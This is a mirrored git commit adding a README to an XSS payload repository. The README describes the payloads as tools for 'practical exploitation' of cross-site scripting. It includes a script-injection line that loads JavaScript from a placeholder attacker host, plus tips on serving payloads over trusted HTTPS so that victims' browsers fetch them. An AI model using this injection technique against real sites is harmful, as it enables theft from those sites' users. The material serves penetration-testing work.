mirror of
https://github.com/nettitude/xss_payloads.git
synced 2024-11-10 06:34:14 +00:00
Added readme info
This commit is contained in:
Strawp
parent
6271f0acb0
commit
caa435d214
1 changed files with 20 additions and 0 deletions
20
README.md
20
README.md
|
|
@ -1 +1,21 @@
|
|||
# xss_payloads
|
||||
|
||||
Payloads for practical exploitation of cross site scripting.
|
||||
|
||||
## Usage
|
||||
|
||||
1. Find XSS vuln in your app
|
||||
2. Get PoC exploit: alert(1) etc
|
||||
3. Host these payloads somewhere
|
||||
4. Use vuln to pull one of these payloads into the app `<script src="http://attackerip/file.js"></script>`
|
||||
5. Profit
|
||||
|
||||
## js vs php files
|
||||
|
||||
Some of the files are plain JavaScript .js files, others are PHP scripts which serve JavaScript when rendered in order to do some more complex stuff. Make sure you have a PHP interpreter running on your web server of choice to get these to work `</obvious>`
|
||||
|
||||
## Common Problems
|
||||
|
||||
* You can't serve these over HTTP if your app is running on HTTPS. You'll need to serve them over HTTPS
|
||||
* If you're running these over HTTPS for actual exploitation rather than a PoC, you'll need a proper trusted TLS cert (Let's Encrypt CA, for example) otherwise victim's browsers won't fetch the files at all. If it's for a PoC you can just temporarily trust your self signed cert.
|
||||
* Hit F12 and view the debug console for any information about why a particular script might not work
|
||||
|
|
|
|||
Loading…
Reference in a new issue